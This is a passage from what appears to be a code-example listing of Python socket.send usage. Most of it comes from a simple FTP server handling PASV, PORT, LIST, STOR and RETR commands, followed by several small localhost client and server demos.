            l.logConnectionInfo(clientAddr, str(dataPort))

            # get the next command that client types in, this command must be either LIST, STOR, or RETR
            receivedCommand = recv_timeout(socket_, l)  #
            l.log("Received", receivedCommand)
            receivedCommand = receivedCommand.split(" ", 1)

            if receivedCommand[0] == "LIST":
                if len(receivedCommand) <= 2:
                    path = ""
                    if len(receivedCommand) == 1:
                        path = "."
                    elif len(receivedCommand) == 2:
                        path = receivedCommand[1]
                    doList(socket_, dataSocket, l, path)
                else:
                    socket_.send(
                        bytes(
                            '501 Syntax error in parameters or argument.\r\n',
                            'ascii'))
                    l.log("Sent",
                          "501 Syntax error in parameters or argument.\r\n")
            elif receivedCommand[0] == "STOR":
                if len(receivedCommand) == 2:  # STOR must have 2 arguments
                    path = receivedCommand[1]
                    doSTOR(socket_, dataSocket, l, path)
                else:
                    socket_.send(
                        bytes(
                            '501 Syntax error in parameters or argument.\r\n',
                            'ascii'))
                    l.log("Sent",
                          "501 Syntax error in parameters or argument.\r\n")
            elif receivedCommand[0] == "RETR":
                if len(receivedCommand) == 2:  # RETR must have 2 arguments
                    path = receivedCommand[1]
                    doRETR(socket_, dataSocket, l, path)
                else:
                    socket_.send(
                        bytes(
                            '501 Syntax error in parameters or argument.\r\n',
                            'ascii'))
                    l.log("Sent",
                          "501 Syntax error in parameters or argument.\r\n")
            else:
                try:
                    socket.send(bytes('500 Unknown command.\r\n', 'ascii'))
                    l.log("Sent", "500 Unknown command.")
                except:
                    pass
        except Exception as e:  # if can't connect to the data server socket in client
            l.log_(str(e))
            try:
                socket_.send(
                    bytes('425 No connection was established.\r\n', 'ascii'))
                l.log("Sent", "425 No connection was established.\r\n")
            except Exception as err:
                l.log_(str(err))
    else:  # if the syntax for PORT command is wrong
        socket_.send(bytes('501 Server cannot accept argument.\r\n', 'ascii'))
        l.log("Sent", "501 Server cannot accept argument.")
    dataSocket.close()
Example #52
0
 def handle_accept(self):
     socket, address = self.accept()
     print ("connection by", address)
     self.remote_clients.append(ClientHandler(self, socket, address))
     ut = {"name" : "server", "msg" : "Hello from server"}
     socket.send(json.dumps(ut))
Example #53
0
def doPASV(socket_, l, serverAddr, clientAddr, port):
    dataPort = random.randint(1025, 65535)
    while dataPort == port or dataPort in usedPortNum:  # make sure port is not in use
        dataPort = random.randint(1025, 65535)
    usedPortNum.append(dataPort)

    p1 = dataPort // 256
    p2 = dataPort % 256

    try:
        dataSocket = socket.socket(
            socket.AF_INET,
            socket.SOCK_STREAM)  # create an INET, STREAMing clientSocket
        dataSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        dataSocket.bind((serverAddr, dataPort))
        dataSocket.listen()  # become a server socket

        server = serverAddr.replace(".", ",")
        message = "227 Entering Passive Mode ({serverAddr},{p1},{p2}).\r\n".format(
            serverAddr=server, p1=p1, p2=p2)
        socket_.send(
            bytes(message, 'ascii')
        )  # send back the new data socket info so client can connect to it
        l.log("Sent", message.strip("\r\n"))

        (clientDataSocket, address) = dataSocket.accept()

        address = ' '.join(str(v) for v in address).split(
            " ")  # convert to ip address of form xxx.xxx.xxx.xxx
        clientAddr = clientAddr.split(" ")

        # check if server is talking to the right client
        if clientAddr[0] != address[0]:
            print(clientAddr[0])
            print(address[0])
            socket_.send(
                bytes('425 Server drops the connection. Please try again.\r\n',
                      'ascii'))
            l.log_(
                "An unrecognized device with address {address} attempts to connect. Drop data connection"
                .format(address=address[0]))
            dataSocket.close(
            )  # drop the connection if the client's ip address doesn't match
            return

    except Exception as e:
        l.log_(str(e))
        try:
            socket_.send(
                bytes('425 No connection was established.\r\n', 'ascii'))
            l.log("Sent", "425 No connection was established.")
        except Exception as err:
            l.log_(str(err))
        return

    message = "Open a connection on port {port} in PASV mode for data transfer".format(
        port=dataPort)
    l.log_(message)

    # get the next command that client types in, this command must be either LIST, STOR, or RETR
    receivedCommand = recv_timeout(socket_, l)
    l.log("Received", receivedCommand)
    receivedCommand = receivedCommand.split(" ", 1)

    if receivedCommand[0] == "LIST":
        if len(receivedCommand) <= 2:
            path = ""
            if len(receivedCommand
                   ) == 1:  # if no path specified, use the current directory
                path = "."
            elif len(receivedCommand) == 2:
                path = receivedCommand[1]
            doList(socket_, clientDataSocket, l, path)
        else:
            socket_.send(
                bytes('501 Syntax error in parameters or argument.\r\n',
                      'ascii'))
            l.log("Sent", "501 Syntax error in parameters or argument.")
    elif receivedCommand[0] == "STOR":
        if len(receivedCommand) == 2:  # STOR must have 2 arguments
            path = receivedCommand[1]
            doSTOR(socket_, clientDataSocket, l, path)
        else:
            socket_.send(
                bytes('501 Syntax error in parameters or argument.\r\n',
                      'ascii'))
            l.log("Sent", "501 Syntax error in parameters or argument.")
    elif receivedCommand[0] == "RETR":
        if len(receivedCommand) == 2:  # RETR must have 2 arguments
            path = receivedCommand[1]
            doRETR(socket_, clientDataSocket, l, path)
        else:
            socket_.send(
                bytes('501 Syntax error in parameters or argument.\r\n',
                      'ascii'))
            l.log("Sent", "501 Syntax error in parameters or argument.\r\n")
    else:
        try:
            socket.send(bytes('500 Unknown command.\r\n', 'ascii'))
            l.log("Sent", "500 Unknown command.")
        except:
            pass
    dataSocket.close()  # after data transfer completes, close the data socket
Example #54
0
def doOtherCommands(socket, serverAddr, clientAddr, port, l, configs):
    receivedMessage = recv_timeout(socket, l)
    l.log("Received", receivedMessage)
    receivedMessage = receivedMessage.split(" ", 1)

    while receivedMessage[0] != "QUIT":  # process the
        if receivedMessage[0] == "CWD":
            if len(receivedMessage) < 2:
                socket.send(
                    bytes('550 Failed to change directory.\r\n', 'ascii'))
                l.log("Sent", "550 Failed to change directory.")
            else:
                doCWD(socket, l, receivedMessage[1])
        elif receivedMessage[0] == "CDUP":
            doCDUP(socket, l)
        elif receivedMessage[0] == "PASV":
            if configs["pasv_mode"] == "NO":
                socket.send(
                    bytes(
                        '500 Passive mode is restricted. Use active mode instead.\r\n',
                        'ascii'))
                l.log(
                    "Sent",
                    "500 Passive mode is restricted. Use active mode instead.")
            else:
                doPASV(socket, l, serverAddr, clientAddr, port)
        elif receivedMessage[0] == "EPSV":
            if configs["epsv_mode"] == "NO":
                socket.send(
                    bytes(
                        '500 Passive mode is restricted. Use active mode instead.\r\n',
                        'ascii'))
                l.log(
                    "Sent",
                    "500 Passive mode is restricted. Use active mode instead.")
            else:
                doEPSV(socket, l)
        elif receivedMessage[0] == "PORT":
            if configs["port_mode"] == "NO":
                socket.send(
                    bytes(
                        '500 Active mode is restricted. Use passive mode instead.\r\n',
                        'ascii'))
                l.log(
                    "Sent",
                    "500 Active mode is restricted. Use passive mode instead.")
            else:
                doPORT(socket, l, serverAddr, receivedMessage)
        elif receivedMessage[0] == "EPRT":
            if configs["eprt_mode"] == "NO":
                socket.send(
                    bytes(
                        '500 Active mode is restricted. Use passive mode instead.\r\n',
                        'ascii'))
                l.log(
                    "Sent",
                    "500 Active mode is restricted. Use passive mode instead.")
            else:
                doEPRT(socket, l)
        elif receivedMessage[0] == "RETR":  # must be called after PASV or PORT
            socket.send(bytes('425 Use PORT or PASV first.\r\n', 'ascii'))
            l.log("Sent", "425 Use PORT or PASV first.")
        elif receivedMessage[0] == "STOR":  # must be called after PASV or PORT
            socket.send(bytes('425 Use PORT or PASV first.\r\n', 'ascii'))
            l.log("Sent", "425 Use PORT or PASV first.")
        elif receivedMessage[0] == "PWD":
            doPWD(socket, l)
        elif receivedMessage[0] == "SYST":
            doSYST(socket, l)
        elif receivedMessage[0] == "LIST":  # must be called after PASV or PORT
            socket.send(bytes('425 Use PORT or PASV first.\r\n', 'ascii'))
            l.log("Sent", "425 Use PORT or PASV first.")
        elif receivedMessage[0] == "HELP":
            cmdName = ''
            if len(receivedMessage) > 1:
                cmdName = receivedMessage[1]
            doHelp(socket, l, cmdName)
        elif receivedMessage[0] == "":
            pass
        else:
            try:
                socket.send(bytes('500 Unknown command.\r\n', 'ascii'))
                l.log("Sent", "500 Unknown command.")
            except:
                break
        receivedMessage = recv_timeout(socket, l)
        l.log("Received", receivedMessage)
        receivedMessage = receivedMessage.split(" ")

    doQuit(socket, l)

    return
Example #55
0
import socket
import pickle
from cryptosystem.run import getCipher

socket = socket.socket()

host = '127.0.0.1'
port = 17041
socket.connect((host, port))

msg = input('Enter your message to be sent to the Server: ')
(cipher, keyMatrix) = getCipher(msg)
data = [cipher, keyMatrix]
data = pickle.dumps(data)
socket.send(data)

socket.close()
Example #56
0
def doEPRT(socket, l):
    socket.send(bytes('502 Command not implemented.\r\n', 'ascii'))
    l.log("Sent", "502 Command not implemented.")
Example #57
0
import socket
import sys

with socket.socket() as socket:
    ip = sys.argv[1]
    port = int(sys.argv[2])
    message = sys.argv[3]
    address = (ip, port)
    socket.connect(address)
    message = message.encode()
    socket.send(message)
    response = socket.recv(1024)
    response = response.decode()
    print(response)
Example #58
0
 def sendMsgToAllSockets(self, msg):
     """send the messages encoded to all the connected sockets """
     for socket in self.connectedSocketList:
         socket.send(msg)
Example #59
0
def sendJSON(socket, data):
    msg = json.dumps(data).encode('utf8')
    total = 0
    while total < len(msg):
        sent = socket.send(msg[total:])
        total += sent
Example #60
0
    if 'client' in sys.argv:
        MODE = 'client'
    else:
        MODE = 'server'
else:
    # Clients can only talk in an interactive shell
    MODE = 'server'

if MODE == 'server':
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    server.bind(('localhost', 42069))
    server.listen()

    print("Entering Server loop")
    while True:
        (client, addr) = server.accept()
        client.send("Hello! You've connected to the server".encode())
        response = client.recv(100).decode()
        print(f'Response ({addr}) - {response}\n')

if MODE == 'client':
    socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    socket.connect(('localhost', 42069))

    server_msg = socket.recv(100).decode()
    print(server_msg)
    client_msg = input('>>> ')
    socket.send(client_msg[:100].encode())
    socket.close()